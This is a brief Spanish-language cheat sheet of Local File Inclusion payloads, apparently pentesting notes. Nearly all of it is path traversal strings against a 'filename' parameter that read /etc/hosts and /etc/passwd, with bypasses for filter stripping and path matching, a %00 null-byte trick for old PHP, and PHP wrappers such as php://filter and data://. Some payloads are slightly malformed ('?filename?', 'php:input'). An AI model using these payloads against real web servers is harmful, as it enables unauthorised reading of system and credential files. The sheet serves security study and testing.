Local File Incrusion (LFI)
http://IP?filename=/etc/host
?filename=../../../../../../etc/hosts
// sanetizado con filtro de busqueda en la ruta /var/www/html
?filename?....//....//....//....//....//etc/hosts
// en caso de que ../ sea remplazada por un caracter vacio
?filename?../../../../../etc//./hosts
// en caso de que este filtrado por la ruta ej(/etc/hosts, /etc/passwd) se ponen dos barras // o /./ y sigue funcionando
?filename?../../../../../etc/passwd%00
//para versiones de php antiguasUso de filtro/wrappers
php://filter
php:input

data://


Last updated